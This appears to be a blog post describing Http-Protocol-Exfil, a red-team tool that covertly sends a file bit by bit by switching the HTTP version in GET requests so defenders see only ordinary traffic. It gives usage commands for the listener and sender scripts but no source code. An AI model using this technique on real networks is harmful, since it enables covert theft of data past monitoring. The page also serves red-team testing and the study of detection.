Kali Linux

Http-Protocol-Exfil : Exfiltrate Files Using The HTTP Protocol Version (“HTTP/1.0” Is A 0 And “HTTP/1.1” Is A 1)

Http-Protocol-Exfil uses HTTP protocol version to send a file bit by bit (“HTTP/1.0” is a 0 and “HTTP/1.1” is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).

Create Listener

To run the listener use listener.py with one optional argument: the port it will be listening in.

python3 listener.py [PORT]

Example:

python3 listener.py 8080

Send a file

To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).

python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]

Example:

python3 sender.py -u “http://127.0.0.1:8080” -i test.txt -o updated_test.txt

Example

First the file is sent:

If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:

The new file is created with the content of the input file:

R K

Recent Posts

How to Install Docker on Ubuntu (Step-by-Step Guide)

Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…

1 day ago

Uninstall Docker on Ubuntu

Docker is one of the most widely used containerization platforms. But there may come a…

1 day ago

Admin Panel Dorks : A Complete List of Google Dorks

Introduction Google Dorking is a technique where advanced search operators are used to uncover information…

2 days ago

Log Analysis Fundamentals

Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…

3 days ago

Networking Devices 101: Understanding Routers, Switches, Hubs, and More

What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…

4 days ago

Sock Puppets in OSINT: How to Build and Use Research Accounts

Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…

4 days ago